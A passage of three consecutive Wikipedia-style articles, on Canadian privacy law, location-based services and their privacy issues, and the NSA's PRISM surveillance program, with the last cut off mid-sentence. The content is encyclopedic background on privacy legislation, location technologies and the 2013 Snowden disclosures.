has made it clear that the rights it guarantees [including privacy rights] must be interpreted generously, and not in a narrow or legalistic fashion".[5]Throughout the late 1990s and 2000s, privacy legislation placed restrictions on the collection, use and disclosure of information by provincial and territorial governments and by companies and institutions in the private sector. The Privacy Act, passed in 1983[6]by theParliament of Canada, regulates how federal government institutions collect, use and disclose personal information. It also provides individuals with a right of access to information held about them by the federal government, and a right to request correction of any erroneous information.[2] The Act established the office of thePrivacy Commissioner of Canada, who is an Officer of Parliament. The responsibilities of the Privacy Commissioner includes supervising the application of the Act itself. Under the Act, the Privacy Commissioner has powers to audit federal government institutions to ensure their compliance with the act, and is obliged to investigate complaints by individuals about breaches of the act. The Act and its equivalent legislation in most provinces are the expression of internationally accepted principles known as "fair information practices." As a last resort, thePrivacy Commissioner of Canadadoes have the "power of embarrassment", which can be used in the hopes that the party being embarrassed will rectify the problem under public scrutiny[2] Although the office of the commissioner has no mandate to conduct extensive research and education under the currentPrivacy Act, the Commissioner believed that he had become a leading educator in Canada on the issue of privacy.[2] The next major change to the Canadian privacy laws came in 1985 in the form of theAccess to Information Act. The main purposes of the Act were to provide citizens with the right of access to information under the control of governmental institutions. The Act limits access to personal information under specific circumstances.[7] TheFreedom of Information Actwas enacted in 1996, and expanded upon the principles of thePrivacy ActandAccess to Information Act. It was designed to make governmental institutions more accountable to the public, and to protect individual privacy by giving the public right of access to records, as well as giving individuals right of access to and a right to request correction of personal information about themselves. It also specifies limits to the rights of access given to individuals, prevents the unauthorized collection, use or disclosure of personal information by public bodies, and redefines the role of thePrivacy Commissioner of Canada.[8] ThePersonal Information Protection and Electronic Documents Act("PIPEDA") governs the topic ofdata privacy, and how private-sector companies can collect, use and disclose personal information. The Act also contains various provisions to facilitate the use of electronic documents. PIPEDA was passed in 2000 to promote consumer trust in electronic commerce, as well as was intended to assure that Canadian privacy laws protect the personal information of citizens of other nationalities to be in compliance withEU data protection law. In recent years, there have been numerous calls for reform as PIPEDA is considered outdated and unable to address AI effectively.[9]The Canadian government responded with a comprehensive reform project under Parliamentary discussion.[10] PIPEDA includes and creates provisions of theCanadian Standards Association's Model Code for the Protection of Personal Information, developed in 1995. Like any privacy protection act, the individual must be informed of information that may be disclosed, whereby consent is given. This may be done through accepting terms, signing a document or verbal communication. In PIPEDA, "Personal Information" is specified as information about an identifiable individual, which includes both collected information and inferred information about individuals.[11] PIPEDA allows for similar provincial laws to continue to be in effect.Quebec,British ColumbiaandAlbertahave subsequently been determined to have similar legislation, and laws governing personal health information only, in Ontario and New Brunswick, have received similar recognition. They all govern: The provincial Acts that have been so recognized, and agencies responsible, are as follows: TheCivil Code of Quebeccontains provisions governing privacy rights that can be enforced in the courts.[12]In addition, the following provinces have passed similar statutes: All four Acts establish a limited right of action, whereby liability will only be found if the defendant acts wilfully (not a requirement in Manitoba) and without a claim of right. Moreover, the nature and degree of the plaintiff‟s privacy entitlement is circumscribed by what is "reasonable in the circumstances". In January 2012, theOntario Court of Appealdeclared that the common law in Canada recognizes a right to personal privacy, more specifically identified as a "tort of intrusion upon seclusion",[17]as well as considering thatappropriation of personalityis already recognized as a tort in Ontario law.[18]The ramifications of this decision are just beginning to be discussed.[19][20]
https://en.wikipedia.org/wiki/Canadian_privacy_law
Location-based service(LBS) is a general term denoting softwareserviceswhich usegeographic data and informationto provide services or information to users.[1]LBS can be used in a variety of contexts, such as health, indoorobject search,[2]entertainment,[3]work, personal life, etc.[4]Commonly used examples of location-based services include navigation software,social networking services,location-based advertising, andtracking systems.[5]LBS can also includemobile commercewhen taking the form of coupons or advertising directed at customers based on their current location. LBS also includes personalized weather services and even location-based games. LBS is critical to many businesses as well as government organizations to drive real insight from data tied to a specific location where activities take place. The spatial patterns that location-related data and services can provide is one of its most powerful and useful aspects where location is a common denominator in all of these activities and can be leveraged to better understand patterns and relationships. Banking, surveillance,online commerce, and many weapon systems are dependent on LBS. Access policiesare controlled bylocationdata or time-of-day constraints, or a combination thereof. As such, an LBS is an information service and has a number of uses insocial networkingtoday as information, in entertainment or security, which is accessible withmobile devicesthrough themobile networkand which uses information on the geographical position of the mobile device.[6][7][8][9] This concept of location-based systems is not compliant with the standardized concept ofreal-time locating systems(RTLS) and related local services, as noted in ISO/IEC 19762-5[10]and ISO/IEC 24730-1.[11]While networked computing devices generally do very well to inform consumers of days old data, the computing devices themselves can also be tracked, even in real-time. LBS privacy issues arise in that context, and are documented below. Location-based services (LBSs) are widely used in many computer systems and applications. Modern location-based services are made possible by technological developments such as theWorld Wide Web,satellite navigationsystems, and the widespread use ofmobile phones.[12] Location-based services were developed by integrating data fromsatellite navigation systems,cellular networks, andmobile computing, to provide services based on the geographical locations of users.[13]Over their history, location-based software has evolved from simple synchronization-based service models to authenticated and complex tools for implementing virtually any location-based service model or facility. There is currently no agreed upon criteria for defining the market size of location-based services, but theEuropean GNSS Agencyestimated that 40% of allcomputer applicationsused location-based software as of 2013, and 30% of all Internet searches were for locations.[14] LBS is the ability to open and close specific data objects based on the use of location or time (or both) as controls and triggers or as part of complexcryptographickey or hashing systems and the data they provide access to. Location-based services may be one of the most heavily usedapplication-layerdecision frameworkin computing. TheGlobal Positioning Systemwas first developed by theUnited States Department of Defensein the 1970s, and was made available for worldwide use and use by civilians in the 1980s.[15]Research forerunners of today's location-based services include the infrared Active Badge system[16](1989–1993), theEricsson-EuropolitanGSMLBS trial by Jörgen Johansson (1995), and the master thesis written by Nokia employee Timo Rantalainen in 1995.[17] In 1990 International Teletrac Systems (laterPacTelTeletrac), founded in Los Angeles CA, introduced the world's first dynamic real-timestolen vehicle recoveryservices. As an adjacency to this they began developing location-based services that could transmit information about location-based goods and services to custom-programmed alphanumericMotorolapagers. In 1996 the USFederal Communications Commission(FCC) issued rules requiring all US mobile operators to locateemergency callers. This rule was a compromise resulting from US mobile operators seeking the support of the emergency community in order to obtain the same protection from lawsuits relating to emergency calls as fixed-line operators already had. In 1997 Christopher Kingdon, of Ericsson, handed in the Location Services (LCS) stage 1 description to the joint GSM group of theEuropean Telecommunications Standards Institute(ETSI) and theAmerican National Standards Institute(ANSI). As a result, the LCS sub-working group was created under ANSI T1P1.5. This group went on to select positioning methods and standardize Location Services (LCS), later known as Location Based Services (LBS). Nodes defined include the Gateway Mobile Location Centre (GMLC), the Serving Mobile Location Centre (SMLC) and concepts such as Mobile Originating Location Request (MO-LR), Network Induced Location Request (NI-LR) and Mobile Terminating Location Request (MT-LR). As a result of these efforts in 1999 the first digital location-based service patent was filed in the US and ultimately issued after nine office actions in March 2002. The patent[18]has controls which when applied to today's networking models provide key value in all systems. In 2000, after approval from the world’s twelve largest telecom operators, Ericsson, Motorola andNokiajointly formed and launched the Location Interoperability Forum Ltd (LIF). This forum first specified theMobile Location Protocol(MLP), an interface between the telecom network and an LBS application running on a server in the Internet domain. Then, much driven by theVodafonegroup, LIF went on to specify the Location Enabling Server (LES), a "middleware", which simplifies the integration of multiple LBS with an operators infrastructure. In 2004 LIF was merged with theOpen Mobile Association(OMA). An LBS work group was formed within the OMA. In 2002, Marex.com in Miami Florida designed the world first marine asset telemetry device for commercial sale. The device, designed by Marex and engineered by its partner firms in telecom and hardware, was capable of transmitting location data and retrieving location-based service data via both cellular and satellite-based communications channels. Utilizing the Orbcomm satellite network, the device had multi level SOS features for both MAYDAY and marine assistance, vessel system condition and performance monitoring with remote notification, and a dedicated hardware device similar to GPS units. Based upon the device location, it was capable of providing detailed bearing, distance and communication information to the vessel operator in real time, in addition to the marine assistance and MAYDAY features. The concept and functionality was coinedLocation Based Servicesby the principal architect and product manager for Marex, Jason Manowitz, SVP, Product and Strategy. The device was branded asIntegrated Marine Asset Management System(IMAMS), and the proof-of-concept beta device was demonstrated to various US government agencies for vessel identification, tracking, and enforcement operations in addition to the commercial product line.[19]The device was capable of tracking assets including ships, planes, shipping containers, or any other mobile asset with a proper power source and antenna placement. Marex's financial challenges were unable to support product introduction and the beta device disappeared. The first consumer LBS-capable mobile Web device was thePalm VII, released in 1999.[20]Two of the in-the-box applications made use of theZIP-code–level positioning information and share the title for first consumer LBS application: the Weather.com app from The Weather Channel, and the[21]TrafficTouch app from Sony-Etak/ Metro Traffic.[22][23] The first LBS services were launched during 2001 by TeliaSonera in Sweden (FriendFinder, yellow pages, houseposition, emergency call location etc.) and by EMT in Estonia (emergency call location, friend finder, TV game). TeliaSonera and EMT based their services on the Ericsson Mobile Positioning System (MPS). Other early LBSs include friendzone, launched by swisscom inSwitzerlandin May 2001, using the technology of valis ltd. The service included friend finder, LBS dating and LBS games. The same service was launched later byVodafoneGermany, Orange Portugal and Pelephone inIsrael.[21]Microsoft's Wi-Fi-based indoor location system RADAR (2000), MIT's Cricket project using ultrasound location (2000) and Intel's Place Lab with wide-area location (2003).[24] In May 2002, go2 andAT&T Mobilitylaunched the first (US) mobile LBS local search application that used Automatic Location Identification (ALI) technologies mandated by the FCC. go2 users were able to use AT&T's ALI to determine their location and search near that location to obtain a list of requested locations (stores, restaurants, etc.) ranked by proximity to the ALI provide by the AT&T wireless network. The ALI determined location was also used as a starting point forturn-by-turndirections. The main advantage is that mobile users do not have to manually specify postal codes or other location identifiers to use LBS, when they roam into a different location. There are various companies that sell access to an individual's location history and this is estimated to be a $12 billion industry composed of collectors, aggregators and marketplaces. As of 2021, a company named Near claimed to have data from 1.6 billion people in 44 different countries,Mobilewallaclaims data on 1.9 billion devices, andX-Modeclaims to have a database of 25 percent of the U.S. adult population. An analysis, conducted by the non-profit newsroom calledThe Markup, found six out of 47 companies who claimed over a billion devices in their database. As of 2021, there are no rules or laws governing who can buy an individual's data.[25] There are a number of ways in which the location of an object, such as a mobile phone or device, can be determined. Another emerging method for confirming location is IoT and blockchain-based relative object location verification.[26] Withcontrol planelocating, sometimes referred to as positioning, the mobile phone service provider gets the location based on the radio signal delay of the closest cell-phone towers (for phones without satellite navigation features) which can be quite slow as it uses the 'voice control' channel.[9]In theUK, networks do not use trilateration; Because LBS services use a single base station, with a "radius" of inaccuracy, to determine a phone's location. This technique was the basis of the E-911 mandate and is still used to locate cellphones as a safety measure. Newer phones andPDAstypically have an integratedA-GPSchip. In addition there are emerging techniques like Real Time Kinematics and WiFi RTT (Round Trip Timing) as part of Precision Time Management services in WiFi and related protocols. In order to provide a successful LBS technology the following factors must be met: Several categories of methods can be used to find the location of the subscriber.[7][27]The simple and standard solution is LBS based on asatellite navigationsystem such asGalileoorGPS.Sony Ericsson's "NearMe" is one such example; it is used to maintain knowledge of the exact location. Satellite navigation is based on the concept oftrilateration, a basic geometric principle that allows finding one location if one knows its distance from other, already known locations. A low cost alternative to using location technology to track the player, is to not track at all. This has been referred to as "self-reported positioning". It was used in themixed reality gamecalledUncle Roy All Around Youin 2003 and considered for use in theAugmented realitygames in 2006.[28]Instead of tracking technologies, players were given a map which they could pan around and subsequently mark their location upon.[29][30]With the rise of location-based networking, this is more commonly known as a user "check-in". Near LBS (NLBS) involves local-range technologies such asBluetooth Low Energy,wireless LAN, infrared ornear-field communicationtechnologies, which are used to match devices to nearby services. This application allows a person to access information based on their surroundings; especially suitable for using inside closed premises, restricted or regional area. Another alternative is an operator- and satellite-independent location service based on access into the deep level telecoms network (SS7). This solution enables accurate and quick determination of geographical coordinates of mobile phones by providing operator-independent location data and works also for handsets that do not have satellite navigation capability. In addition, theIP addresscould provide the end-user's location. Many otherlocal positioning systemsandindoor positioning systemsare available, especially for indoor use. GPS and GSM do not work very well indoors, so other techniques are used, including co-pilot beacon for CDMA networks, Bluetooth, UWB,RFIDand Wi-Fi.[31] Location-based services may be employed in a number of applications, including:[7] For the carrier, location-based services provide added value by enabling services such as: In theU.S.theFCCrequires that all carriers meet certain criteria for supporting location-based services (FCC 94–102). The mandate requires 95% of handsets to resolve within 300 meters for network-based tracking (e.g. triangulation) and 150 meters for handset-based tracking (e.g. GPS). This can be especially useful when dialing anemergency telephone number– such asenhanced 9-1-1inNorth America, or112inEurope– so that the operator can dispatch emergency services such asemergency medical services,policeorfirefightersto the correct location. CDMA and iDEN operators have chosen to use GPS location technology for locating emergency callers. This led to rapidly increasing penetration of GPS in iDEN and CDMA handsets in North America and other parts of the world where CDMA is widely deployed. Even though no such rules are yet in place in Japan or in Europe the number of GPS-enabled GSM/WCDMA handset models is growing fast. According to the independent wireless analyst firmBerg Insightthe attach rate for GPS is growing rapidly in GSM/WCDMA handsets, from less than 8% in 2008 to 15% in 2009.[34] As for economic impact, location-based services are estimated to have a $1.6 Trillion impact on the US economy alone.[35] European operators are mainly usingCell IDfor locating subscribers. This is also a method used in Europe by companies that are using cell-based LBS as part of systems to recover stolen assets. In the US companies such asRave Wirelessin New York are using GPS and triangulation to enable college students to notify campus police when they are in trouble. Currently there are roughly three different models for location-based apps on mobile devices. All share that they allow one's location to be tracked by others. Each functions in the same way at a high level, but with differing functions and features. Below is a comparison of an example application from each of the three models. [36] Mobile messaging plays an essential role in LBS. Messaging, especially SMS, has been used in combination with various LBS applications, such as location-based mobile advertising.SMSis still the main technology carrying mobile advertising / marketing campaigns to mobile phones. A classic example of LBS applications using SMS is the delivery of mobile coupons or discounts to mobile subscribers who are near to advertising restaurants, cafes, movie theatres. The Singaporean mobile operatorMobileOnecarried out such an initiative in 2007 that involved many local marketers, what was reported to be a huge success in terms of subscriber acceptance. The Location Privacy Protection Act of 2012 (S.1223)[37]was introduced by SenatorAl Franken(D-MN) in order to regulate the transmission and sharing of user location data in the United States. It is based on the individual's one time consent to participate in these services (Opt In). The bill specifies the collecting entities, the collectable data and its usage. The bill does not specify, however, the period of time that the data collecting entity can hold on to the user data (a limit of 24 hours seems appropriate since most of the services use the data for immediate searches, communications, etc.), and the bill does not include location data stored locally on the device (the user should be able to delete the contents of the location data document periodically just as he would delete a log document). The bill which was approved by theSenate Judiciary Committee, would also require mobile services to disclose the names of the advertising networks or other third parties with which they share consumers' locations.[38] With the passing of theCAN-SPAM Actin 2003, it became illegal in the United States to send any message to the end user without the end user specifically opting-in. This put an additional challenge on LBS applications as far as "carrier-centric" services were concerned. As a result, there has been a focus on user-centric location-based services and applications which give the user control of the experience, typically by opting in first via a website or mobile interface (such asSMS, mobile Web, andJava/BREWapplications). TheEuropean Unionalso provides a legal framework for data protection that may be applied for location-based services, and more particularly several European directives such as: (1) Personal data: Directive 95/46/EC; (2) Personal data in electronic communications: Directive 2002/58/EC; (3) Data Retention:Directive 2006/24/EC. However the applicability of legal provisions to varying forms of LBS and of processing location data is unclear.[39] One implication of this technology is that data about a subscriber's location and historical movements is owned and controlled by the network operators, including mobile carriers and mobile content providers.[40]Mobile content providers and app developers are a concern. Indeed, a 2013 MIT study[41][42]by de Montjoye et al. showed that 4 spatio-temporal points, approximate places and times, are enough to uniquely identify 95% of 1.5M people in a mobility database. The study further shows that these constraints hold even when the resolution of the dataset is low. Therefore, even coarse or blurred datasets provide little anonymity. A critical article by Dobson and Fisher[43]discusses the possibilities for misuse of location information. Beside the legal framework there exist several technical approaches to protect privacy usingprivacy-enhancing technologies(PETs). Such PETs range from simplistic on/off switches[44]to sophisticated PETs using anonymization techniques (e.g. providing k-anonymity),[45]or cryptograpic protocols.[46]Only few LBS offer such PETs, e.g.,Google Latitudeoffered an on/off switch and allows to stick one's position to a free definable location. Additionally, it is an open question how users perceive and trust in different PETs. The only study that addresses user perception of state of the art PETs is.[47]Another set of techniques included in the PETs are thelocation obfuscationtechniques, which slightly alter the location of the users in order to hide their real location while still being able to represent their position and receive services from their LBS provider. Recent research has shown thatcrowdsourcingis also an effective approach at locating lost objects while still upholding the privacy of users. This is done by ensuring a limited level of interactions between users.[48]
https://en.wikipedia.org/wiki/Location-based_service#Privacy_issues
PRISMis acode namefor a program under which the United StatesNational Security Agency(NSA) collectsinternetcommunications from various U.S. internet companies.[1][2][3]The program is also known by theSIGADUS-984XN.[4][5]PRISM collects stored internet communications based on demands made to internet companies such asGoogle LLCandAppleunder Section 702 of theFISA Amendments Act of 2008to turn over any data that match court-approved search terms.[6]Among other things, the NSA can use these PRISM requests to target communications that were encrypted when they traveled across theinternet backbone, to focus on stored data that telecommunication filtering systems discarded earlier,[7][8]and to get data that is easier to handle.[9] PRISM began in 2007 in the wake of the passage of theProtect America Actunder theBush Administration.[10][11]The program is operated under the supervision of theU.S. Foreign Intelligence Surveillance Court(FISA Court, or FISC) pursuant to theForeign Intelligence Surveillance Act(FISA).[12]Its existence was leaked six years later by NSA contractorEdward Snowden, who warned that the extent of mass data collection was far greater than the public knew and included what he characterized as "dangerous" and "criminal" activities.[13]The disclosures were published byThe GuardianandThe Washington Poston June 6, 2013. Subsequent documents have demonstrated a financial arrangement between the NSA'sSpecial Source Operations(SSO) division and PRISM partners in the millions of dollars.[14] Documents indicate that PRISM is "the number one source of raw intelligence used for NSA analytic reports", and it accounts for 91% of the NSA's internet traffic acquired under FISA section 702 authority."[15][16]The leaked information came after the revelation that theFISA Courthad been ordering a subsidiary of telecommunications companyVerizon Communicationsto turn over logs tracking all of its customers' telephone calls to the NSA.[17][18] U.S. government officials have disputed criticisms of PRISM in theGuardianandWashington Postarticles and have defended the program, asserting that it cannot be used on domestic targets without awarrant. They additionally claim that the program has helped to prevent acts ofterrorism, and that it receives independent oversight from the federal government'sexecutive,judicialandlegislativebranches.[19][20]On June 19, 2013, U.S. PresidentBarack Obama, during a visit to Germany, stated that the NSA's data gathering practices constitute "a circumscribed, narrow system directed at us being able to protect our people."[21] Edward Snowdenpublicly revealed the existence of PRISM through a series of classified documents leaked to journalists ofThe Washington PostandThe Guardianwhile he was an NSA contractor at the time, thus fleeing toHong Kong.[1][2]The leaked documents included 41 PowerPoint slides, four of which were published in news articles.[1][2] The documents identified several technology companies as participants in the PRISM program, includingMicrosoftin 2007,Yahoo!in 2008,Googlein 2009,Facebookin 2009,Paltalkin 2009,YouTubein 2010,AOLin 2011,Skypein 2011 andApplein 2012.[22]The speaker's notes in the briefing document reviewed byThe Washington Postindicated that "98 percent of PRISM production is based on Yahoo, Google, and Microsoft".[1] The slide presentation stated that much of the world's electronic communications pass through the U.S., because electronic communications data tend to follow the least expensive route rather than the most physically direct route, and the bulk of the world's internet infrastructure is based in the United States.[15]The presentation noted that these facts provide United States intelligence analysts with opportunities for intercepting the communications of foreign targets as their electronic data pass into or through the United States.[2][15] Snowden's subsequent disclosures included statements that government agencies such as theUnited Kingdom'sGCHQalso undertook mass interception and tracking of internet and communications data[23]– described byGermanyas "nightmarish" if true[24]– allegations that the NSA engaged in "dangerous" and "criminal" activity by "hacking" civilian infrastructure networks in other countries such as "universities, hospitals, and private businesses",[13]and alleged thatcomplianceoffered only very limited restrictive effect on mass data collection practices (including of Americans) since restrictions "are policy-based, not technically based, and can change at any time", adding that "Additionally,auditsare cursory, incomplete, and easily fooled by fake justifications",[13]with numerous self-granted exceptions, and that NSA policies encourage staff to assume the benefit of the doubt in cases of uncertainty.[25][26][27] Below are a number of slides released by Edward Snowden showing the operation and processes behind the PRISM program. The "FAA" referred to is Section 702 of the FISA Amendments Act ("FAA"), and not the Federal Aviation Administration, which is more widely known by the same FAA initialism.[28] The French newspaperLe Mondedisclosed new PRISM slides (see pages 4, 7 and 8) coming from the "PRISM/US-984XN Overview" presentation on October 21, 2013.[29]The British newspaperThe Guardiandisclosed new PRISM slides (see pages 3 and 6) in November 2013 which on the one hand compares PRISM with theUpstream program, and on the other hand deals with collaboration between the NSA's Threat Operations Center and the FBI.[30] PRISM is a program from theSpecial Source Operations(SSO) division of the NSA, which in the tradition of NSA's intelligence alliances, cooperates with as many as 100 trusted U.S. companies since the 1970s.[1]A prior program, theTerrorist Surveillance Program,[31][32]was implemented in the wake of theSeptember 11 attacksunder theGeorge W. Bush Administrationbut was widely criticized and challenged as illegal, because it did not include warrants obtained from theForeign Intelligence Surveillance Court.[32][33][34][35][36]PRISM was authorized by the Foreign Intelligence Surveillance Court.[15] PRISM was enabled underPresident Bushby theProtect America Act of 2007and by theFISA Amendments Act of 2008, which immunizes private companies from legal action when they cooperate with U.S. government agencies in intelligence collection. In 2012 the act was renewed byCongressunderPresident Obamafor an additional five years, through December 2017.[2][37][38]According toThe Register, the FISA Amendments Act of 2008 "specifically authorizes intelligence agencies to monitor the phone, email, and other communications of U.S. citizens for up to a week without obtaining a warrant" when one of the parties is outside the U.S.[37] The most detailed description of the PRISM program can be found in a report about NSA's collection efforts under Section 702 FAA, that was released by thePrivacy and Civil Liberties Oversight Board(PCLOB) on July 2, 2014.[39] According to this report, PRISM is only used to collect internet communications, not telephone conversations. These internet communications are not collected in bulk, but in a targeted way: only communications that are to or from specific selectors, like e-mail addresses, can be gathered. Under PRISM, there is no collection based on keywords or names.[39] The actual collection process is done by theData Intercept Technology Unit(DITU) of the FBI, which on behalf of the NSA sends the selectors to the U.S. internet service providers, which were previously served with a Section 702 Directive. Under this directive, the provider is legally obliged to hand over (to DITU) all communications to or from the selectors provided by the government.[39]DITU then sends these communications to NSA, where they are stored in various databases, depending on their type. Data, both content and metadata, that already have been collected under the PRISM program, may be searched for both US and non-US person identifiers. These kinds of queries became known as "back-door searches" and are conducted by NSA, FBI and CIA.[40]Each of these agencies has slightly different protocols and safeguards to protect searches with a US person identifier.[39] Internal NSA presentation slides included in the various media disclosures show that the NSA could unilaterally access data and perform "extensive, in-depth surveillance on live communications and stored information" with examples including email, video and voice chat, videos, photos, voice-over-IP chats (such asSkype), file transfers, and social networking details.[2]Snowden summarized that "in general, the reality is this: if an NSA, FBI, CIA, DIA, etc. analyst has access to query rawSIGINT[signals intelligence] databases, they can enter and get results for anything they want."[13] According toThe Washington Post, the intelligence analysts search PRISM data using terms intended to identify suspicious communications of targets whom the analysts suspect with at least 51 percent confidence to not be U.S. citizens, but in the process, communication data of some U.S. citizens are also collected unintentionally.[1]Training materials for analysts tell them that while they should periodically report such accidental collection of non-foreign U.S. data, "it's nothing to worry about."[1][41] According toThe Guardian, NSA had access to chats and emails on Hotmail.com and Skype because Microsoft had "developed a surveillance capability to deal" with the interception of chats, and "for Prism collection against Microsoft email services will be unaffected because Prism collects this data prior to encryption."[42][43] Also according to The Guardian'sGlenn Greenwaldeven low-level NSA analysts are allowed to search and listen to the communications of Americans and other people without court approval and supervision. Greenwald said low level Analysts can, via systems like PRISM, "listen to whatever emails they want, whatever telephone calls, browsing histories,Microsoft Worddocuments.[31]And it's all done with no need to go to a court, with no need to even get supervisor approval on the part of the analyst."[44] He added that the NSA databank, with its years of collected communications, allows analysts to search that database and listen "to the calls or read the emails of everything that the NSA has stored, or look at the browsing histories or Google search terms that you've entered, and it also alerts them to any further activity that people connected to that email address or that IP address do in the future."[44]Greenwald was referring in the context of the foregoing quotes to the NSA programXKeyscore.[45] Unified Targeting Tool Shortly after publication of the reports byThe GuardianandThe Washington Post, the United StatesDirector of National Intelligence,James Clapper, on June 7, 2013, released a statement confirming that for nearly six years the government of the United States had been using large internet services companies such as Facebook to collect information on foreigners outside the United States as a defense against national security threats.[17]The statement read in part, "The GuardianandThe Washington Postarticles refer to collection of communications pursuant to Section 702 of theForeign Intelligence Surveillance Act. They contain numerous inaccuracies."[47]He went on to say, "Section 702 is a provision of FISA that is designed to facilitate the acquisition of foreign intelligence information concerning non-U.S. persons located outside the United States. It cannot be used to intentionally target any U.S. citizen, any other U.S. person, or anyone located within the United States."[47]Clapper concluded his statement by stating, "The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans."[47]On March 12, 2013, Clapper had told the United States Senate Select Committee on Intelligence that the NSA does "not wittingly" collect any type of data on millions or hundreds of millions of Americans.[48]Clapper later admitted the statement he made on March 12, 2013, was a lie,[49]or in his words "I responded in what I thought was the most truthful, or least untruthful manner by saying no."[50] On June 7, 2013, U.S. PresidentBarack Obama, referring to the PRISM program[51]and the NSA's telephone calls logging program, said, "What you've got is two programs that were originally authorized by Congress, have been repeatedly authorized by Congress. Bipartisan majorities have approved them. Congress is continually briefed on how these are conducted. There are a whole range of safeguards involved. And federal judges are overseeing the entire program throughout."[52]He also said, "You can't have 100 percent security and then also have 100 percent privacy and zero inconvenience. You know, we're going to have to make some choices as a society."[52]Obama also said that government collection of data was needed in order to catch terrorists.[53]In separate statements, senior Obama administration officials (not mentioned by name in source) said that Congress had been briefed 13 times on the programs since 2009.[54] On June 8, 2013, Director of National Intelligence Clapper made an additional public statement about PRISM and released afact sheetproviding further information about the program, which he described as "an internal government computer system used to facilitate the government's statutorily authorized collection of foreign intelligence information from electronic communication service providers under court supervision, as authorized by Section 702 of the Foreign Intelligence Surveillance Act (FISA) (50 U.S.C. § 1881a)."[55][56]The fact sheet stated that "the surveillance activities published inThe Guardianand theWashington Postare lawful and conducted under authorities widely known and discussed, and fully debated and authorized byCongress."[55]The fact sheet also stated that "the United States Government does not unilaterally obtain information from the servers of U.S. electronic communication service providers. All such information is obtained with FISA Court approval and with the knowledge of the provider based on a written directive from the Attorney General and the Director of National Intelligence." It said that the attorney general provides FISA Court rulings and semi-annual reports about PRISM activities to Congress, "provid[ing] an unprecedented degree of accountability and transparency."[55]Democratic senatorsUdallandWyden, who serve on theU.S. Senate Select Committee on Intelligence, subsequently criticized the fact sheet as being inaccurate.[clarification needed]NSA DirectorGeneral Keith Alexanderacknowledged the errors, stating that the fact sheet "could have more precisely described" the requirements governing the collection of e-mail and other internet content from US companies. The fact sheet was withdrawn from the NSA's website around June 26.[57] In a closed-doors Senate hearing around June 11, FBI DirectorRobert Muellersaid that Snowden's leaks had caused "significant harm to our nation and to our safety."[58]In the same Senate hearing, NSA Director Alexander defended the program.[further explanation needed]Alexander's defense was immediately criticized by Senators Udall and Wyden, who said they saw no evidence that the NSA programs had produced "uniquely valuable intelligence." In a joint statement, they wrote, "Gen Alexander's testimony yesterday suggested that the NSA's bulk phone records collection program helped thwart 'dozens' of terrorist attacks, but all of the plots that he mentioned appear to have been identified using other collection methods."[58][59] On June 18, NSA Director Alexander said in an open hearing before the House Intelligence Committee of Congress that communications surveillance had helped prevent more than 50 potential terrorist attacks worldwide (at least 10 of them involving terrorism suspects or targets in the United States) between 2001 and 2013, and that the PRISM web traffic surveillance program contributed in over 90 percent of those cases.[60][61][62]According to court records, one example Alexander gave regarding a thwarted attack by al Qaeda on the New York Stock Exchange was not in fact foiled by surveillance.[63]Several senators wrote Director of National Intelligence Clapper asking him to provide other examples.[64] U.S. intelligence officials, speaking on condition of anonymity, told various news outlets that by June 24 they were already seeing what they said was evidence that suspected terrorists had begun changing their communication practices in order to evade detection by the surveillance tools disclosed by Snowden.[65][66] In contrast to their swift and forceful reactions the previous day to allegations that the government had been conducting surveillance of United States citizens' telephone records, Congressional leaders initially had little to say about the PRISM program the day after leaked information about the program was published. Several lawmakers declined to discuss PRISM, citing its top-secret classification,[67]and others said that they had not been aware of the program.[68]After statements had been released by the president and the Director of National Intelligence, some lawmakers began to comment: SenatorJohn McCain(R-AZ) SenatorDianne Feinstein(D-CA), chair of the Senate Intelligence Committee SenatorRand Paul(R-KY) SenatorSusan Collins(R-ME), member of Senate Intelligence Committee and past member of Homeland Security Committee RepresentativeJim Sensenbrenner(R-WI), principal sponsor of thePatriot Act RepresentativeMike Rogers(R-MI), a chairman of thePermanent Select Committee on Intelligence. SenatorMark Udall(D-CO) RepresentativeTodd Rokita(R-IN) RepresentativeLuis Gutierrez(D-IL) SenatorRon Wyden(D-OR) Following these statements some lawmakers from both parties warned national security officials during a hearing before the House Judiciary Committee that they must change their use of sweeping National Security Agency surveillance programs or face losing the provisions of the Foreign Intelligence Surveillance Act that have allowed for the agency's mass collection of telephone metadata.[78]"Section 215 expires at the end of 2015, and unless you realize you've got a problem, that is not going to be renewed," Rep. Jim Sensenbrenner, R-Wis., author of the USA Patriot Act, threatened during the hearing.[78]"It's got to be changed, and you've got to change how you operate section 215. Otherwise, in two and a half years, you're not going to have it anymore."[78] Leaks of classified documents pointed to the role of a special court in enabling the government's secret surveillance programs, but members of the court maintained they were not collaborating with the executive branch.[79]The New York Times, however, reported in July 2013 that in "more than a dozen classified rulings, the nation's surveillance court has created a secret body of law giving the National Security Agency the power to amass vast collections of data on Americans while pursuing not only terrorism suspects, but also people possibly involved in nuclear proliferation, espionage and cyberattacks."[80]After Members of the U.S. Congress pressed the Foreign Intelligence Surveillance Court to release declassified versions of its secret ruling, the court dismissed those requests arguing that the decisions can't be declassified because they contain classified information.[81]Reggie Walton, the current FISA presiding judge, said in a statement: "The perception that the court is a rubber stamp is absolutely false. There is a rigorous review process of applications submitted by the executive branch, spearheaded initially by five judicial branch lawyers who are national security experts, and then by the judges, to ensure that the court's authorizations comport with what the applicable statutes authorize."[82]The accusation of being a "rubber stamp" was further rejected by Walton who wrote in a letter to Senator Patrick J. Leahy: "The annual statistics provided to Congress by the Attorney General ...—frequently cited to in press reports as a suggestion that the Court's approval rate of application is over 99%—reflect only the number offinalapplications submitted to and acted on by the Court. These statistics do not reflect the fact that many applications are altered to prior or final submission or even withheld from final submission entirely, often after an indication that a judge would not approve them."[83] The U.S. military has acknowledged blocking access to parts ofThe Guardianwebsite for thousands of defense personnel across the country,[84]and blocking the entireGuardianwebsite for personnel stationed throughout Afghanistan, the Middle East, and South Asia.[85]A spokesman said the military was filtering out reports and content relating to government surveillance programs to preserve "network hygiene" and prevent any classified material from appearing on unclassified parts of its computer systems.[84]Access tothe Washington Post, which also published information on classified NSA surveillance programs disclosed by Edward Snowden, had not been blocked at the time the blocking of access toThe Guardianwas reported.[85] The former head of the AustrianFederal Office for the Protection of the Constitution and Counterterrorism,Gert-René Polli, stated he knew the PRISM program under a different name and stated that surveillance activities had occurred in Austria as well. Polli had publicly stated in 2009 that he had received requests from US intelligence agencies to do things that would be in violation of Austrian law, which Polli refused to allow.[86][87] The Australian government has said it will investigate the impact of the PRISM program and the use of thePine Gapsurveillance facility on the privacy of Australian citizens.[88]Australia's former foreign ministerBob 